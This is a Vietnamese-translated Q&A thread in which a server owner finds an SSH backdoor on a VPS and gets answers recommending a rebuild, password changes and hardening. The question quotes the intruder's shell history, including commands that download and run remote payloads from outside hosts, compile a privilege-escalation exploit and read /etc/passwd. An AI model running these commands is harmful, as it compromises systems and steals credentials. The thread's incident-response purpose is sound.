Tìm thấy SSH Backdoor trên VServer. Phải làm sao


24

Hôm qua tôi đã kiểm tra lịch sử các lệnh trên VServer của mình. Tôi tìm thấy một số dòng đáng ngờ.

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

Đặc biệt là sniffer.tgz làm tôi sốc. Tôi thiết lập một máy ảo và tải xuống kho lưu trữ tgz này. Tôi bắt đầu thiết lập và nó cho tôi những dòng này:

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

Có ai biết làm thế nào để loại bỏ điều này?


Câu trả lời:


66

Đây là những gì bạn nên làm trên tất cả các hệ thống mà bạn đã có sniffer.tgztrên: Nuke Them From Orbit ngay lập tức và bắt đầu lại từ một bản cài đặt sạch. (Nghĩa là phá hủy (các) hệ thống, cài đặt lại sạch, tải dữ liệu từ các bản sao lưu sạch - giả sử bạn có các bản sao lưu sạch, và sau đó làm cứng (các) hệ thống trước khi đưa chúng trở lại Internet).

Bất cứ khi nào bạn có phần mềm độc hại hoặc tin tặc xâm nhập vào hệ thống của bạn như thế này, đây là lúc để phân tích lại cách cấu hình hệ thống của bạn và đảm bảo không lặp lại các bước tương tự mà chúng có. Nhưng, bởi vì đây có thể không phải là một hệ thống mà bạn có khả năng bỏ qua và phân tích pháp y, và vì đây có thể là máy chủ duy nhất của bạn, đã đến lúc phá hủy hệ thống ảo và bắt đầu lại từ đầu (như tôi đã nói ở trên).

(Và điều này áp dụng cho mọi tình huống như vậy khi bạn có phần mềm độc hại trên hệ thống. Trừ khi bạn có phần cứng dự phòng để thay thế một cái gì đó như thế này để bạn có thể cách ly và kiểm tra pháp y hệ thống mà hầu hết người dùng không có, bạn không có lựa chọn nào khác ngoài để nuke hệ thống và bắt đầu lại.)

Nếu không phân tích máy chủ của bạn, tôi thực sự không thể nói bạn đã làm gì sai, nhưng có khả năng là cửa hậu này nằm sâu trong hệ thống hơn là một 'chương trình' đơn giản được cài đặt. Và, vì những kẻ xấu đã phải cài đặt một cửa hậu trên hệ thống của bạn, bạn có thể cho rằng tất cả mật khẩu của mình hiện đã bị vi phạm và không còn an toàn (cho dù đó là SSH, hoặc MySQL root hoặc bất kỳ loại mật khẩu nào khác có EVER đã được nhập vào hệ thống máy tính này). Thời gian để thay đổi tất cả mật khẩu của bạn!


Khi bạn đã sao lưu trong một môi trường sạch sẽ, đây là một số mẹo cơ bản về các bước làm cứng để xem xét. Lưu ý rằng vì những điều này làm cho chủ đề rộng hơn nhiều, tôi thực sự không thể đi sâu vào chi tiết ở đây, nhưng chắc chắn đã đến lúc phải thực hiện một số bước cứng để bảo vệ hệ thống của bạn:

  1. Bật tường lửachỉ cho phép truy cập vào các cổng cần được mở . ufwtồn tại để đơn giản, vì vậy hãy sử dụng nó. sudo ufw enable. (Cấu hình ufwđúng cho môi trường của bạn là một câu chuyện khác và vượt ra ngoài giới hạn của câu hỏi này.)

  2. Hạn chế quyền truy cập vào SSH từ xa . Điều này không phải lúc nào cũng có thể thực hiện được, nhưng lý tưởng nhất là bạn sẽ xác định các địa chỉ IP thuộc sở hữu của bạn và đặc biệt đưa danh sách trắng chúng vào tường lửa. (Nếu bạn đang sử dụng địa chỉ IP dân cư động, hãy bỏ qua bước này).

  3. Khóa quyền truy cập SSH vào máy chủ của bạn và chỉ yêu cầu sử dụng các khóa SSH để xác thực . Bằng cách này, tin tặc không thể tấn công máy chủ của bạn và thử và chỉ cần đoán mật khẩu. Việc đoán khóa riêng phù hợp sẽ khó khăn hơn nhiều (vì bạn phải đánh bại tất cả chúng) và điều này giúp bảo vệ chống lại các cuộc tấn công tàn bạo.

  4. Nếu bạn đang chạy một trang web, hãy đảm bảo khóa các quyền để mọi người không thể tải lên / thực hiện mọi thứ một cách thoải mái . Làm điều này thay đổi từ trang này sang trang khác, vì vậy tôi không thể cung cấp cho bạn thêm hướng dẫn ở đây (không thể làm như vậy).

  5. Ngoài ra nếu bạn đang chạy một trang web bằng Joomla hoặc Wordpress hoặc như vậy, hãy đảm bảo bạn luôn cập nhật môi trường và được vá các lỗ hổng bảo mật từ các nhà cung cấp phần mềm .

  6. Nếu có thể, hãy thiết lập, định cấu hình và sử dụng các phương thức xác thực hai yếu tố (2FA) cho những thứ mà bạn xác thực . Có nhiều giải pháp để xác thực yếu tố thứ hai cho các ứng dụng khác nhau và bảo mật các ứng dụng khác nhau theo cách này nằm ngoài phạm vi của bài đăng này, vì vậy bạn nên nghiên cứu về điểm này trước khi chọn giải pháp.

  7. Nếu bạn hoàn toàn phải sử dụng mật khẩu trong thiết lập của mình, hãy sử dụng trình quản lý mật khẩu phù hợp (dựa trên đám mây không nhất thiết phải là lựa chọn tốt) và sử dụng mật khẩu dài (25+ ký tự), mật khẩu ngẫu nhiên, không thể nhầm lẫn khác nhau cho từng mục riêng lẻ được bảo mật bằng mật khẩu (do đó khuyến nghị cho người quản lý mật khẩu). (Tuy nhiên, bạn nên cân nhắc mạnh mẽ KHÔNG sử dụng mật khẩu khi có thể (chẳng hạn như xác thực SSH) và sử dụng 2FA nếu có thể).


Bình luận không dành cho thảo luận mở rộng; cuộc trò chuyện này đã được chuyển sang trò chuyện .
terdon

Tôi chấp nhận câu trả lời, vì đây là những gì tôi sẽ làm. Không bao giờ tôi cố gắng đóng Backdoor tại VM, chỉ vì lợi ích cá nhân của tôi.
Itskajo

0

Nếu có một cửa hậu thì có thêm 3 cửa. Cô lập, sao lưu dữ liệu, nuke nó và khôi phục dữ liệu cẩn thận. Hãy cẩn thận với mọi dữ liệu của cron, php hoặc thậm chí mysql, tất cả đều có thể bị xâm phạm. Hãy nhớ rằng tại thời điểm này, chúng có tất cả mật khẩu và băm của bạn, vì vậy nếu các máy khác của bạn có cấu hình tương tự thì có lẽ chúng cũng đã hack chúng ... Phần khó là tìm ra cách chúng bắt đầu. Nếu bạn có WordPress, hãy tìm phần mềm độc hại trong plugin / chủ đề, v.v ... Kiểm tra quyền của bạn, bạn có thể có 777 ở mọi nơi. Không có câu trả lời đơn giản, bạn đang xem xét rất nhiều công việc.


Không nhất thiết phải có nhiều hơn một, tuy nhiên thường xuyên hoặc có thể đó có thể không phải là trường hợp ở đây. Và họ có thể không có tất cả mật khẩu của họ chắc chắn. Cũng không phải là "có thể" họ đã hack các máy khác, bạn không biết ý định của họ cũng như những gì bị đánh hơi, hoặc nếu chương trình xấu thậm chí được kích hoạt ngoài việc có mặt hoặc chạy theo cách nào đó. Và "khôi phục dữ liệu cẩn thận" là lời khuyên rất chung cho một cái gì đó đòi hỏi những hành động rất tỉ mỉ.
James
Khi sử dụng trang web của chúng tôi, bạn xác nhận rằng bạn đã đọc và hiểu Chính sách cookieChính sách bảo mật của chúng tôi.
Licensed under cc by-sa 3.0 with attribution required.